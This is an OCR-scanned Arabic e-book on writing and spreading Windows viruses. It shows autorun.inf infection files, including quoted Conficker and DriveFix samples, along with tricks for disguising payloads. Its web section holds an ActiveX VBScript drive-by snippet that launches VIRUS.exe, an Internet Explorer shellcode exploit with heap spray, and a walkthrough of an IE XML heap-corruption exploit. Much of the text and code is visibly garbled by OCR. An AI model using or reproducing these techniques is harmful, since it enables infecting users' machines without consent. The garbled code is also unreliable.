7 / اعات وا سامح جعہ 


بسم الله الرحمن الرحيم 
اقرأ من فضلك هذه المقدمة 


* هذا الكتاب تم بذل جهد كبير جدا لكي يوصل لك بهذا الشكل فلا يسمح لأحد إن ينسخ 
او یطبع ای جزء من الكتاب فأعلم ان الله يرى 


*هذا الكتاب تم تنفيذه لكسب العلم وليس لإيذاء المسلمين فمجرد قراءه هذا الكتاب 
فأنك تقسم بالله العظيم انك لم تؤذى بيه احد وتستخدمه ليفيد الناس 


*قبل ما اطرح هذا الکتاب خفت کثیرا ان یتم استخدامه بشکل خاطئ ویقوموه الذین فى 
قلوبهم مرض بإيذاء الناس بيه ولكنى تغلبت على خوفي لكي يعم العلم لنا جميعا 
فكل كتب التي تتكلم عن الفيروسات بلغه العربية عبارة عن حشو العقول بكلام 
انشاء لا فیده منه فقررت اطرح هذا الكتاب بأسلوب شرح حقيقي والهدف من هذا 
الكتاب هو التمرس والتطبيق بنفسك وليس السمع ونظريات عن طريق استخدام 
برنامج الكمبيوتر الوهمى الذى يجعل لك تنفيذ هذه الفيروسات ممكنا فى مجال 
معزول عن نظامك بدلا من ايذأ نفسك مثل برامج 

Virtual PC gs VMware-workstation-5.0 


*هذا الكتاب وارد بيه الأخطاء لان هذا الكتاب عبارة عن اجتهاد شخصي وتم الاستعانة 
بكثير من خبره زملائي في موقع كتب وغيرهم فإذا وجدت خطأ قم بمراسلتي على 
ایمیلی 
* هذا الكتاب لم يذكر كل شيء عن تقنيات الفيروسات وعليك بلأستعانه بكتب زملائي 
والاهم من ذلك هوالسعى الشخصى والبحث فى النت عن كل جديد فى المواقع 
العربية والاجنبيه يمكنك وقتها ارسال هذه الكتب او الصفحات الى ايميلى لكي 
اكسب العلم أيضا ويعم الخير 


سامح جمعه 
Sameh_gomaa2003@ yahoo.com‏ 


شکر وتقدیر 


شكر وتقدير الى موقع (كتب) هذا الموقع له الفضل بعد الله فى معرفتى كثيرا على 
العلوم التقنيه 


انصح بقراءه هذه الكتب 

1- کتاب دراسه فى علم الفيروسات للمؤلف وجدى عصام 
2- كتاب الحمايه بواسطة النظام 

3 کتاب تجارب شخصيه مع الفيروسات 

4- كتاب الامن والحماية فى الانترنت 

5- برمجه الملفات الدفعية 

6- عمل رقعه امنیه لعده ثغرات 


کل هذه الكتب موجوده ضموقع( كتب) فى قسم الامن والحمايه 


موقع الفريق العربى للبرمجه قسم الامن والحمايه 


ماحوظه : 
لكى تصبح محترفا فى الفيروسات والحمايه لابد من معرفة الاتى : 
1- تکون محترف بأی لغه برمجه حدیثه 
2- تكون على مستوى من لغه التجميع ( الاإسمبلى ) 
3- معرفه اوامر dQ‏ ردص ہہء ( سطر الاوامر ) 
4- معرفه لغه الباتش ( الملفات الدفعيه ) 
5 تكون شديد المعرفه بملفات الويندوز والرجسترى للويندوز تماما 
6- تكون ذات صبر و حب لهذا المجال 


ق دخول الفيرس للويندور 


* اذأو :(auto run) auto play‏ 
إن سرعة إنتقال الفيروسات و إنتشارها و سرعهة تعطيلها للجهاز و عملها يكمن في وجود ملف 
"Auto run"‏ مرفق معها و يعمل على تنشيطها ...لذلك و من هذا المنطلق نستطيع إستغلال 

هذه الملفات 
autorun,inf‏ ط 

Setup Information‏ کک 
E | oke‏ 
و جعلها تعمل لحسابنا .. 
لقد جمعت أكثر من ملف "'ہںآه)ں ۸" من الفيروسات التي دخلت إلى جهازي و سأقوم بوضع 
إثنين من هذه الملفات و شرح كيفية إستغلالها ... 
کود ملف ال رںاہاں۸ الأول: 


Autorun in1‏ - المغگر ة3 
ملف تحرير تنسيق عرض تعليمات [AUTORUN|‏ 
ت [AUTORUN]‏ 
OPEN=x.exe OPEN=x.exe‏ 
shellopen\icommand=x.exe‏ 
shell\lopen\command=x.exe shelnexplore\command=x.exel‏ 


shell\lexplore\command=x.exe 
: کود ملف ال ہںuآہ)ں۸ الثاني‎ 


Autaorun2.bxt E َ‏ - المفكرة 
ملف لحرير اسيق عرض لعليمات ( 
[au orun] [autorun]‏ 


shellexecute=x exe shellexecute=x.exe 


open=x.exe 
ے‎ shelllopen\Command=x.exe 
PENS KEE shellopen\Default=1 


shelllopen\Command= x.exe 
shell\lopen\Default=1 
لاحظ أن محتوى ملف الأوتورن يأمر بأن يتم فتح ملف ء×ع.× عند الدخول للقرص مباشرة أو‎ 
open ,explore, auto play حتی اختيار أحد هذه الأوامر‎ 
وهذا دليل على أن طريقة فتح القرص المفيرس من خلال النقر عليه باليمين ثم اختيار‎ 
او «eصه غير ناجحة إذا كان هذا السطر موجود في ملف الأوتورن‎ explore 
shell\lexplore\command =x.exe 
shelllopen\Command= x.exe 
shell\lautoplay\Command= x.exe 


shelllopen=Open 


وتستخدم طريقه اخرى وهى جعلك انت تشغل الفيرس وهى وضع هذا الكود فى الاول 
action=Open folder to view files‏ 
icon= %SystemRoot %\system32\SHELL32.dIl,4‏ 
وتلاحظ انه اعطى بعد ذلك شكل الايقونه للفيرس شكل فولدر عن طريق ملف النظام 
SHELL 11‏ الموجود فى 1۸32 عءرو لتعطيك هذه النافذه الملغومه 


Dont select the first line (E:) 


content. 


What da you wart Windows to da? 1 [ | 


r 

2 pen folder ta view files 
2 Play Media Files 
© ا‎ 


الآن كل ما علينا هو تبديل أسم الملف مء×م.× إلى أسم الملف المراد تشغيله 

و حفظ الملف بلاحقة گہ. لیصبح مثلا گرا.ہرںاہاں ۸ و يجب ان يكون هذا الملف و 
الفايروس بمجاورة بعضهما .. و نستطيع استخدام هذا ال ",ںآ ه)ں ۸" في وحدات التخزين 
المتنقلة (الفلاشة ) و السيديات °4 ولجعل الفايروس يفتح تلقائيا مع فتح القرص الصلب نضع 
هذا الكود فى كل برتيشن بجوار الفيرس 


gr disk or device cartains more than ane type of 


[autorun] 
shell\1-open\Command= x.exe 
Shellexecute=x.exe 
: واليكم اكواد خاصه لبعض الفيروسات المعروفه‎ 
فیرس کونفیکر (إع]اع]گہمع)****‎ **** 


[autorun ] 

Action= open folder to view files 

icon= %SystemRoot %o\system32\SHELL32.dIl,4 

shellexecute=Rundll]32.exe .\ RECYCLER\S-5-3-42-2819952290- 

8240758988-879315005-3665\ jwgkvsq.vmx,ahaezdrn 

و هذا الذيرس الذعين استخدم طريقه خطير هى و ضع اكواد وار قام ور موز كذيره و سط الاكواد 
ويضع علامه ( ; ) قبل الحروف والارقام لكى يتجاهلها الويندوز و يربك الانتى فيرس 

; FF443HG4FH354GHGHF% HJM @ BGJHG#NMMN666 

أو حقن الاوامر المراد تنفيذها ثنائيا ضمن ما يسمى (عءعدطإدع رإجم81 ) الكلام التافه الذي 

سيتجاهله ويندوز عند قراءة تعليمات ملف الاو تران و هذا الذيرس استخدم طريقه جديده و هو 

جعل الفيرس من النوع ملفات 11 وليس من نوع م×ء سوف تسأل كيف يعمل و هو ليس ملف 


0 
0 


تنفیدی . 


الجواب هو يقوم بستدعاء ملف النظام الذى يقوم بتشغيل ملفات 1[ وهو ملف موجود فى هذا 
المسار 

C:\WINDOWS\system32\ Rundl132.exe 
والخدعه الثانيه : قد تقول لكن امتداد الذيرس ×إ۷ وليس 11ل لان الذيرس دقوم بعد الاصابه‎ 
وهو فى الاصل ملف 11ا‎ d11 بتغيير الامتداد الى‎ 


00اه ارق 
ملف تخیر تسف عرض تعليمان 


tUCQpZHYLDuWNYNgrmVukBEsRHeegibdyXNIXP |4 


Î abor Inf - mınrSepad اا اک‎ 


Fis Ect Vimy Favorta:s Toals Help 


EVaQoAolCICKcSylKInlucSPqzFwwnbYsjtPyyh OFZ Ê GC WI: 

Lt A ITITILA  DC F ZI J LA FYI" i * 

[AutoRun] IIIIII TIII IIIIII | 
IIIIIIIII 

: ea MNKcIBTZPWOKvIfuAEDELACQFnbDEKMIBK IIIIII | 

open UExTC,EXE yy 


:TIZAORYNF BolnilgrwKrXZyCxmkeHcMeA g.InnljC 
IynHUezyvYTBivhaKQvOkdjheJ oaN Hm 
shellhopemCommand=ugxITe, exe 

:lswIJVdpcqF AISFEYWoDd 

shelhopemDefault=1 
:4SF2TAZ31FBSBAE1DS1E0NNZBIS32BEASSEFS 
OFEABTZTDIZCTBPCS1571 


DriveFix.exe‏ فیرس 


1 

1 

1 - 
MII AIT IIIII 
7 

1 


SIIITIILILL# 3I f EI jJ, EI E ûJ ti1 EI ã1 1 #4 T 
IM JI PI HA FIFI FL TM IM 1 TL el I HI Ke FI FI 
IIIIN [III DII 11111 : 


1 I ۴ 


WN IHS Tab: 8 Col llr! 


[autorun] 
open=RESTORE\c-1-3-64-8794238531-8742492-9897532\DriveFix.exe 
icon= %SystemRoot %o\system32\SHELL32.dIl,4 
action=Open folder to view files 
shelllopen=Open 
shell\lopen\command=RESTORE\c-1-3-64-8794238531-8742492- 
9897532\DriveFix.exe 
shell\open\default=1 


*** ومن الطرق أيضا وهي تابعة لموضوع الأوتورن*** 


هذه الطريقة وهي أن الفايروس يتخفى بامتداد عرز الصوري مثلعمز.0_٠‏ لكي يوهم المستخدم 
بانه صورة 

ولكن ملف الأوتورن التابع له يوضح أن الفايروس عبارة عن سكربت tمذاء؟‏ بامتدادوما۷ 
وهذا الامتداد يعمل عن طريق الملفم×ع.)مWscri‏ 

والواضح في ملف الأوتورن أنه أمر ال عم×ع.امذاءء۷ أن يقوم بتشغيل الفايروس 

کود: 


[autorun] 


shellexecute=Wscript.exe /e:vbs (0_0) .jpPg 


***ومن تقنيات التخفي والخداع*** 

التخفي بأيقونات وأسماء ملفات النظام الأساسية مثل 

الفايروس 10ع« باسم ملف النظام)٤وم‏ ع والفايروس ءءء باسم ملف النظام sئرررو‏ 
وإن لاحظت أن الفايروس ءءءذر٣مء‏ قد تخفى بأحد أيقونات النظام لكن السؤال هنا كيف أعلم 
متی یکون )10ں وغیره فایروس ومتی یکون ملف نظام مهم!! 

الجواب بسيط جدا 

لاحظ أن جميع الملفات المدعوة ب خوم طح« إن التي ذکر مlqnl LOCAL gy SYSTEM‏ 
NETWORK SERVICE SERVICE‏ هي في الغالب ملفات للنظام مهمة جدا أما ما 
ذكر أمامها اسم المستخدم وهو فهو في الغالب فايروس. نقطة أخيرة في هذه الفقرة وهي أنكم 
كما تعلمون معظم الفايروسات تقوم بإخفاء نفسها وتظهر بأيقونة باهتة (في حال أنه خيار إظهار 
الملفات المخفية مفعل وسليم)والمشكلة فيها هي أنه عند المحاولة للتعديل في خصائصها لا 
افتح قائمة ابدأ ثم اذهب إلى تشغيل واكتب مء 

Start > Run > cmd 

ثم اکتب 

Attrib -r -s -h 

ثم مسار الملف كاملا بين“ “» 

مثال 

کود: 


Attrib -r -s -h"C:\1lol . exe" 


عندها سيتم إزالة 

Read only , System , Hidden 

من خصائص الملف وحتى ولو لم يمكن إزالتها بالطريقة العادية 
ومن ثم تعمل له مسح 

Del C:\1o01. exe: كود‎ 


ملفات ذو الاشكال المخادعه. 


(اسلوب ں٤۲ )su‏ 
نقوم بتحویل ملف مع×م الى ملف شورت کات بتغيير امتداد الملف من م×ع. الى امتداد fام.‏ 


Microsoft i aer 2 Microsoft Corporation‏ ا 
وبهذه الطريقه يصعب على الانتى فيرس كشفه لعدم توفر كود الفيرس بسهوله وايضا على 
- الطريقه التانيه وهی بعمل شورت كات (٤uء٤إuںطء)‏ للملف الفيرس ثم تغيير شكل الايقونه 
لملف الشورت كات واختيار شكل اخر وعمل اخفاء للملف الاساسى 


2 MA YÎJSF, EXE = YÎFUSF , EXE WÎFUSF EXE 
Windows Explorer | Stortout Shortcut 
e a E Microsoft Corporation Fw IKE 1 EE 
% . + » IT 
الطريقه التالته استخدام برامج لتغيير الايقونه متل‎ 


HesHacker .Exë 
f Shortcut 
2 FB 


Bal_T0_Exe Loner ktEer EXE 
° Balt To Exe L_onwerkter 
Fatih Eodalk 


` ool E-BatchMaker, exe 
E: E[sza5ب4]-Batch‎ Maker 


EY musYc Hacktcenk 


- (استخدام فیروسات ذات امتدادات غیر م×م) 


مثل فیروسات (ءطv.)‏ ٤ءء‏ وفیروسات (2ط.) 41ط وفیروسات حافظه الشاشه 
ıy.SCRرlwgت HTML (.html)‏ يرست scrap (.shs)‏ 
والیكم طريقه نقوم بتغییر امتداد 5×۴ الى امتداد غير معروف من قبل الكثيرمن مستخدمي 
الانترنت والامتداد هو S3158‏ وهذا الامتداد خطيرجدا لما فيه من امكانيات الاتصال مع البرامج 
الاخرى Scrap Object gg‏ 
والطريقه هي كالتالي : 
قم بتشغیل برنامج ۷٥۲۵۲24‏ افتح البرنامج وصغر النافذہ والان اضغط على البرنامج ئuآ¡۷‏ 
بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج ۷۷٥۲۵٣2‏ سوف 
ينتقل الملف الى البرنامج بکل سهوله تانیا اضغط بالزر الايمن على الملف الذي انتقل الى 

Package Object رتخ|Word Pad‏ ثم Edit Package‏ سوف تظھر لك نافذہ باسم 
Copy Package ۃû Edit ةnئl رöۃخlObject Packager - Package in Document‏ 
ثالثا واخيرا اختر المجلد الذي به ملف ۲م ۷آم۵1)5 ٤‏ تم اضغط في المكان الفارغ على الزرار 
الايمن تم اختر (م)ءو۲ لصق) سوف يتكون لك ملف شكله غريب باسم مجإءS‏ وهذا هوالملف 
قد تغير امتداده الىءطو 


اسلوب الثغرات الويب و امس مد فى النظام: 


فلطالما أحتوت الأنظمه على ثغرات › ولكن قد تتفاوت هذه الثغرات من ثغرة لا يوجد لها 

ضرر كبير على المستخدم الى ثغرة خطيرة جدا قد تؤدى إلى أختراق النظام بالكامل . على 

.ية حال ليست جميع الثغرات أو نقاط الضعف (ع[طھإءہاں) قابله للاستثمار)زام×م 
الفايروسات قد تستثمر نقاط الضعف هذه لإصابة الجهاز أو للحصول على صلاحيات أعلى 
بالمخترق في الجهاز المخترق» ويطلق على من يقوم باستخدام هذه الإستثمارات 4ع)هام×م 
بلمخترق A)†)4 eker‏ . 

هناك نقاط ضعف تفنية وهي التي تستهدف أنظم4 Technical Weakness qÛ‏ 


Internet Explorer ٽlرغت‎ 


الثغره الاولى: 
وهوتشغيل الفيرس مجرد دخولك للموقع وطبعا سوف يعمل وينسخ نفسه فى جهازك 


الآن نأتي لكتابة بعض الأكواد. 
كود التشغيل الموجود في._]۲M]‏ 
<script language=vbscript>‏ 
on error resume next‏ 
dim sys‏ 
Set df = document.createElement(''object'")‏ 
df.setAttribute '"'classid'"", ''clsid:BD96C556-65A3-11D0-983۸A-‏ 
00CO04FC29E36 '""‏ 
set fso = df.createobject(''Scripting.FileSystemObject'",'""")‏ 
set s=df.CreateObject(''Shell.Application.1'",'""")‏ 
set re=df.createobject(''wscript.shell'",'"'")‏ 
sys=fso.GetSpecialFolder(1)‏ 
s.Open ("'"C:\ VIRUS.exe'"")‏ 
</script>‏ 


ثغره الثانيه : 


الاستغلال يستهدف ثغرة مكتشفه في الطريقة التي يستخدم متصفح Internet Explorer‏ 
معلومات CSS‏ المستخدمة في معظم صفحات الويب على الانترنت. 


41-- 

aecuritylab. ir 

E4anran sat (at) yahoo [dotj com [email concealed] 
<4 IDOCTYPE HIML PUBLIC "-7/W3C/ DTD HHETML 1.0 Transaitional77EN" "http: 7 fu W3 -OEG/ TRY xhtr 
HEITML xulna="http : / www w3 .org/ 1999/ xhtml"? 
HEALD 

ACEIptE* 

function load) { 

YAE e7 

e=document . qetElementaByTagName ("STILE") [O]; 

e -outerHTHI="1"; 

} 

4# SCEIpt* 

SIILE type="text/ casa" 

body{ averflow: acrall; margin: O; } 

EI Aks 


4aCEIpt language="javaacript"* 

Tar sahellcode = unescape ( "suEBFCSu0I44tu0000$u458B3uBBE3CsuNS TCSuO1TESuBBEFSu184Fsu5FSBSu 
I120 %u43EBtu348BtuN 18BSu31EEu99CISuB4ACSuT4COSuUCIDTSuDDCESuCEI1SuF4EB Su 
5438 u0424uES TS SuSFBBSuN1Z2 4u EEBSuOCEBSuSB4BSu1CSFSuEBI1Su1CSBsu118B u 
BSEBSu24SCSuC304SuUCI3ISuBBO4ةu3040SuCOESSuICTEsu40BBtuBBICEu1CTOsuBBAD‎ Su 
ESB $uISEEBsuBIBBSuNIBISuNIONSuEBBESuSF3CSuFo31suS SENS uFBEISuCIE3SuSOTBESu 
TEGBSuEZDEtuGBT3SuUFESBSuDEBAEuUFFSTSubC3ETSuCCo1su0D63") ; 

var bigblock = unescape ["su3090su3030") 7 

yar headersaize = 20; 

aE alackapace = headersaizetahellcode . length; 

while (bigblack. length®salacksapace) bigblockt=bigblock; 

Tfillblock = bigblock. substring (0, salackapace!) ; 

block = bigblaock. aubatring (0, bigblock. length-alackapace) ; 

while [block .lengthtalackapace<Ix40000) block = blocktblocktfillblockr 
memory = new Arrayl); 

for (=0; x€4000; xtt) memaorylx] = block + sahellcode; 

# SACEIPptE* 


+ HEAD? 
BODY onload="load [j "* 
< BODY 
2 HTML 


حان الوقت للانتقال إلى متصفح آخر ولو بشکل موقت.. لکن هل یمکن أن تنتقل إلى الإصدار 8 في 
ظل نشر خبر آخر بأن 158 و ميكانيكية الحمايةه من 55× تحوي على خطا تصميمي يخلق ثغرات 
85×في المواقع التي لا تحوي أساساً على ثغرات 


بسم الله الرحمن الرحيم. 
اليوم ان شاء الله سنتطرق للتحليل التقني لثغرة المتصفح حيث سيشمل ذلك تحليل الإستنمار وتحديد 
مكان الخطأ وشرح لطريقة الإستنمارة الرائعة في ذلك. 


-1نظرة عامة: 

تعتبر هذه الثغرة من أخطر الثغرات التي انتشرت في هذه الآونة الأخيرة من ناحية انها ذات تأثير 
بالغ فهي تسمح بتشغيل اكواد ضار5 (Code Execution)‏ في اجهزة المستخدمين»مايعني هذا هو 
1- تحميل فيروسات او احصنة طروادة للجهاز مما يعرض صاحبه لفقدان او انتهاك لخصوصيته. 
2- او فتح قناة او منفذ يسمح للمستخدم بالدخول المباشر و الغير مصرح للجهاز. 

ممما يجعلها كما سبق ذكر من اخطر الثغرات التي ارتفع من اجلها مؤشر الخطورة لدى 
Symantec‏ كدليل على ذلك قامت مجموعة من الفيروسات ڊawlتlqllaz‏ ک— Spreading‏ 
ityاu1nerabi‏ اي ثغرة تنتشر من خلالهاءو بالعودة إلى اصل الثغرة ومكتشفها فإن الإستثمار 
انتشر سهوا من خلال باحثين صينين وقيل ان الثغرة في 15 نوفمبر اي قبل نشرها كانت تباع في 
منتيديات و وصل سعرها إلى $15,000 وهذا الخبر من موقع 

.The Register 

نظرة تحليلية: 

الثغرة تحدث اثناء معالجة مستند 1× في صفحة ]۲1[ ء«لنلقي نظرة على البيانات التي تحدث 
الثغرة شاهد الصورة؛ 


1 IEEHL ID=I= 
3 8 E 
3 = E 
4 TT ET AG 1 
چ‎ 1 IMANE 
SRC=RLTP:7 7 ER2 SIU; EEA SIU: .XXKXXX DOF 
2 ج‎ ——- ۳ 
E 
E 2 
11 ا‎ 
12 2 HL 
13 
ET <SPAN DATASREZ=HI DATAFLD=TZ DATAFOREMLTAS=HTHL= 
15 <EML ID=I> ر‎ 
1# 2 KML 
a <SPAN DATASRCZC=#I DATAFLD=T DATAFORHLATAS=HTHL= 
13 2 SP AM 
ت1‎ 2# SP AN 


كما تلاحظ الصفحة عبارة عن مستند 11× داخل صفحة H1]‏ .الصفحة تحتوي على وسوم 
خاصة التي عليها إيطار بالأخضر. 

ربما علينا التطرق لمفهوم .11× لكي يكون الشرح واضحا اكثرا: 

M1×هي‏ ان صح التعبير عبارة عن لغة أتت لوصف البينات اي ان البرامج او المتصفح عند 
تعامله مع بيانات من نوع 11× فإنه سيتعامل مع نوع البيانات وما يحدد صفة للبيانات ونوعها 
هي الأوسمة وءوه) »والمرونة التي تقدمها 11× انها تجعل لك وسوم خاصة وهذا ما اعتقد انه 
الأمر المهم وهذا هو الغرض الرئيسي من اللغةءلنفرض انك تتعامل مع بيانات ما يتم نقلها عبر 


الأنترنت ولتكن طلبات شراء مثلا وهذه البيانات لما تصل إلى الجهة المعينة فإن التعامل معها على 
اساس نصوص واشكال امر صعب لذلك ولتسهيل الأمر العملية يتم إستخدام 11× بإستعمال اوسمة 
خاصة على سبيل المثال: 
<request>‏ 
<book>hacking</book>‏ 
<price>15000$</price>‏ 
<request>‏ 


وسيتم معالجتها كما هي موضوعة يعني سعر الكتاب هو 15000$ و اسم الکتاب هو ڇہ¡ck۾]۴‏ › 
فهذا باختصار يوضح فائدة 11[× وما تعني الأوسمة الخاصة. 
نعود للموضوع. 
وكما قلنا سابقا ان الإستثمار يحوي اوسمة خاصة مؤطرة بالأخضر هي: 
<×>و <> لاتنسى هذه الأوسمة لأننا سنعتمد عليها في تخطي برامج الحماية(; 
الأمر الآخر هو هذاء 
[CDATA[.....image link here....]]‏ 


الوسم المؤطر باللون البني هذا الوسم في لغة 11× يوحيي للمحلل الغوی او مو٥‏ الخاص ب 
M1×وهو‏ الذي يقوم بتحليل مستندات 11> بأن مادخل العارضيتين عبارة بيانات لا يتم 

معالجتها لكي تفهم هذا يجب ان تعرف ان اصل الثغرة هو ذلك الرابط. 

حيث يتم كتابة اول اربعة بايت من اسم الموقع على مؤشر مما يتسبب في تشغيل اكواد ضارة وهذا 

ما سنتطرق إليه بعد قليل. 

بصفة عامة اثناء التعامل مع مستندات XM]‏ فال Parserيقوم‏ بمعالجة ماهو موجود بين 
الأوسمة على سبيل المثال: 


<test>im text</test> 


هنا ال مه۴ يقوم بمعالجة )×ع) ”1 ياترى لماذا؟ لأنه في بعض الأحيان تكون الأوسمة متداخلة 
فیما بینها مثلا: 
<test><test2>im text</test2><test>‏ 


لذلك عليه معالجةما بداخل الوسم <اوع)> ليعرف انه يوجد وسم آخر هو <2ءع)> لكن هنالك 
مشكلة ماذا لو اردت ان اقوم بإرفاق اكواد جافا سكريبت او ]1[ داخل اوسمة وكلنا يعلم ان 
الأكواد تحتوي كثيرا على <> هاتين العلاميتين ماذا سنفعل؟ هنا يأتي دور الوسم الخاص 
۸( حیث انه یتیح لك ان تدخل اکواد ۲1 ] او اي کود تشاء بینه بحیث ان ال Parser‏ 
لن يقوم بمعالجته وإظهار اخطأء في حالة انك ادخل الأكواد من دون ذلك الوسم لأنه سيحصل خلط 
للبينات وهذا مثال على ذلك 

<test><test2><html>im text<html></test2><test> 


فكما ترى هنا ان الأمر سيختلط بين اوسمة 11M‏ و ×XM1‏ لذلك لوسم 1۸ KD۸‏ دور کبیرء 
اتمنى ان الآمر توضح» اعلم ان الموضوع تحول إلى موضوع برمجه لكن المر مهم جدا ويجب ان 
نتطرق لجميع النواحي في الإستثمار لكي يسهل إستيعابه. 


الشق الثاني من المستند هو عبارة عن وسم من نوع $5۸١‏ وهذا الوسم يستعمل في تخصيص 
اعدادت معينه لنص او مستند او جزء كما هو موصح. 
فهناك نرى ان 5۲۸۸ الأول يدل على ان قالب 11× المكتوب فوق يجب ان يتم معاملته على 
اساس كود HT MI‏ لاحظ جیدا الكود. 
٥-1‏ ۸ ۲۸5 1(۸وهو مصدر البيانات والذي يشير إلى 1 وهو مستند 11× وهذا مکتوب في 
بدایته. 
A ۲1 0=°‏ ها يتم تحديد اكثر وهنا يقصد الحقل الذي به الوسم ٣‏ داخل مستندXM1×‏ 
"A FORMA TA S-HTML‏ وهنا طبيعة التعامل مع القالب وكما هو موضح التعامل على 
اساس >gد. HTML‏ 
لكن ألا ترى امر غريب في الصفحة....نفس التعليمة تم إعادتها وهي إعلام المتصفح بأن البيانات 
يجب ان يتم تعاملتھا على اساس. H' 1M‏ 
وهنا المشكلة العظمى حيث ان وضع الوسم داخل نفسه يسبب ما agآٳ‏ پڊ Heap Corruption‏ 
والذي يسمح بكتابة 4 بيتات من اسم الهوست -المؤطرة باللون الأحمر- على مؤشر لكائن او دالة 


تحدید مکان الخطأً وتقنيات الإستثمار: 
الآن افتح 187 في عا( ر[01 واذهب للعنوان التالي 7 ۸8105٥‏ وضع نقطة توقف وذلك بعد 
تشغيل المتصفح في حالة التنقیح بالضغط علی ۴9 قم بتصفح الملف 1رہ M٤.)‏ ۴۲۸۸ 1 باستخدام 
7 بعد فتح الملف مباشرة تجد أن المتصفح توقف عند نقطة التوقف تلك التي بها التعليمات 
التالية: 
7EASI1DDC MOV ECX,DWORD PTR DS:[EAX]‏ 


اضغط ۳9 مرة أخرى ستجد نفسك عند نفس المكان مرة أخرى لكن مع بعض التغير قليلا على 
المسجلات لاحظ الصورة: 


الآن لنضع سيناريو لهجوم متوقع يمكن ان يشن على هذه القطعة من الكود الموجودة فوق في 
الصورة: 
7EA81DDC MOV ECX,DWORD PTR DS:[EAX]‏ 
7EA8§1DDE PUSH EDI‏ 
7EA8§1DDF PUSH EAX‏ 
7EA81DE0 CALL DWORD PTR DS:[ECX+84]‏ 


الكود المكتوب فوق يقوم بنقل اربعة بايتات -و تكون هذه الأربع بيتات في اغلب الأحيان مؤشر- إلى 
المسجل 5٣×‏ ثم يقوم بدفع محتويات المسجلين ٤1‏ و ×۸ إلى المكدس هتان التعليمتان لا 
تهمنا لكن الأهم هي التعليمة المواليةءوكما قلت ان هذه الأربع بيتات عبارة عن مؤشرفإنه سيتم 
إستعماله وتنفيذ محتوياتها بتعليمة القفزة الأمر هنا يختلف قليلا وهو ان عملية الإستدعاء تكون 
باضافة 84 إلى المؤشر وهذا الأمر لا يشكل فارقا. 

دعنا الآن نقترح سيناريو للهجوم. 


ما نريده هو ان نجعل البرنامج يقوم بتشغيل شل كود الخاص بنا فكيف نصل إلى ذلك...لاحظ معي لو 
اننا نقوم بالسيطرة على المسجل ×۸ وجعله يشير إلى عنوان هذا العنوان يحتوي على عنوان 


للشل كود الخاص بنا اي انا ۸ مثلا يشير إلى العنوان 0×04213326 وهذا العنوان بدوره 
يحتوي على عنوان وهذا الأخير يشير إلى شل كود خاص بناءومن ثم سيتم نقل عنوان الشل كود 
الخاص بنا إلى المسجل E)×‏ ءفبذلك بعد الوصول لتعليمة الإستدعاء 

CALL DWORD PTR DS5S:[ECX+84] 


فإن البرنامج سيقفز لمحتويات المسجل 84 + ٣×‏ وعملية الزيادة ليست مشكلة فيمكننا تخطيتها 
باضافة N0‏ او انقاص 84 الأهم هو التحكم في المسجل ×۸ او التحكم في المؤشر التي تم نقله 
ل) ×۸ لاحظ العبارة الأخيرة فهي مهمة لأن مسجل ×۸ لا يمكن ان يتم تغيره إلا بوجود تغير 
على مستوى الذاكرة لأن المسجل ×4 سيتم نقل البينات المعدلة إليه -مؤشر.۔ 

لكن السؤال الذي يطرح نفسه كيف سيتم التعديل على مكان حساس او الوصول إلى مكان تخزين 
مؤشر في الذاكرة؟ الجواب هو ببساطة الثغرة التي اتاحت لنا ذلك. 

عن طريق تكرير الوسم ×5۸ داخل وسم مثله يعلم المتصفح بأن المستند 11× يجب التعامل 
معه على اساس ]۲۷[ فإنه سيحدث تخيرب في الكومة زام uإإه٤‏ م4٥1[‏ والذي سيؤدي 
بدوره إلى الكتابة على ذلك المؤشر الذي قلنا انه سيتم نقله إلى المسجل× ۸ع › 

مع العلم ان اغلب البرامج تعتمد على مھم في تغزين المؤشرات للكائنات 

بما اننا الآن استطعنا التحكم في المسجل ×۸ وبالتالي في ٣×‏ وبالتالي حققنا الهدف المنشود 
وهو تشغيل الكود الخاص بنا. 

لكن هنالك مشكلةء يعني هل سنضع عنوان عشوائي وكيف سنستطيع معرفة مكان الشل كود الخاص 
بنا واذا عرفناه فهل سنضمن ان العنوان سيكون مماثل واين سنضع الشل كود هل سنضعه في 
صفحة 1111 ثم نحاول ايجاده في الذاكرة لأخذ عنوانه؟ لذلك هنالك تقنية تستعمل في ثغرات 
المتصفح لتجعلها اكثر استقرارا وقابلية للإستثمار وتسمى هذه التقنية - Sray‏ Heapاول‏ استعمال 
لھا کان سنة 2005 من طرف ھاکر اسمهلd‏ ہار 

Heap Spray:أ‎ ةيiãت‎ 

وكما طرحنا ذلك الكم من التسائلات تأتي تقنية Heap Spray‏ لتسهل عملية الإستثمارء مبداً هذه 
التقنية هو اولا ايجاد مكان مناسب للشل كود و الأمر الآخر هو حل مشكلة Invalid Memory‏ 
cat‏ ]وينتج هذا الأخير عند التعامل مثلا مع ومرذإاء ٠0dء‏ رن حيث ان عنوانك التي 
وصعته سيصبح على هيئة) unicode‏ انا لا اتحدث عن هذہ الثغرة بل اتحدث في حالات أخرى) متلا 
عنوانك هو 0×15424546 سيصبح هكذا) 0×15004200 لأن اليونيكود يتم فيه التمثيل لكل 
محرف ب 2بايت (و الآن اصبح عنوانك لا وجود له لذلك يتم توسيع الكومة إلى ان تجعل من مكانك 
Location‏ 14ا۷2 اي مكان موجود في الذاكرة»لنفرض ان عنوان الكومة يبدا ب 0×15000000 
فأننا سنمدد الكومة وذلك بحجز اماكن كبيرة بها لتصل إلى 15004200 اي اننا نقوم بحجز 4200 
بايت او اكثر لجعل ذلك المكان موجود في الذاكرة. 

نعود لثغرتنا وكما قلنا سابقا ان اول اربعة بايت من عنوان الهوست سيتم كتابتها على مؤشر الكائن 
و التي تمثلت في 2570 &2570#;&#هذه يقابلها في النظام السداسي عشر 0۸0۸0۸0۸ ١الآن‏ 
قمنا بالكتابة على مؤشر الكائن مسجلنا ×۸ يشير إلى 0×0۸0۸0۸0۸4 ماذا بعد؟ الآن سنقوم 
بجعل هذا المكان من الذاكرة موجود وإلا فلا فائدة من ذلك»شاهد كود الإستثمار الموجود في-ع: 

sploit.html : 

مع ملاحظة اني استعملت كود E۸۲ S۶۸۸۷‏ [[خاص ب ”110ج تجده في الرابط التالي: 
http://www.milwOrm.com/exploits/7477‏ 

الكود الخاص ڊ:Spray Heap‏ 


var spray = unescape('' %u0a0a %u0a0a'""); 
do { 

spray += spray; 

} while(spray.length < Oxd0000); 

memory = new Array(Û; 

for(i = 0; i < 100; i++) 

memory[i] = spray + shellcode; 


